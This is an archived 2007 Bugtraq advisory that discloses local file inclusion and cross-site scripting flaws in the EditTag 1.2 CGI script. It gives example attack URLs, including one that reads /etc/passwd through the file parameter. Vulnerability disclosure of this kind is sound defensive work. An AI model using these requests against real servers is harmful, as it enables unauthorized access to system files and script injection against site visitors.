lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070105172629.7517.qmail@securityfocus.com> Date: 5 Jan 2007 17:26:29 -0000 From: nj@...kerz.ir To: bugtraq@...urityfocus.com Subject: Multiple bugs in EditTag Script: EditTag Version: 1.2 Author: Greg Billock (dmacewen@....net) Discoverer: NetJackal (nima_501[4T]yAhoo[D0T]com - nj[4T]hackerz[D0T]ir) I am sorry for my BAD English. Description: 1) Local file injection: An attacker can use edittag.cgi or edittag_mp.cgi (maybe .pl) to inject files (ex. /etc/passwd) http://www.victim/edittag/edittag.cgi?file=INJECT http://www.victim/edittag/edittag.pl?file=INJECT http://www.victim/edittag/edittag_mp.cgi?file=INJECT http://www.victim/edittag/edittag_mp.pl?file=INJECT ex. http://www.victim/edittag/edittag_mp.pl?file=/etc/passwd 2)XSS http://www.victim/edittag/mkpw_mp.cgi?plain=XSS http://www.victim/edittag/mkpw.pl?plain=XSS http://www.victim/edittag/mkpw.cgi?plain=XSS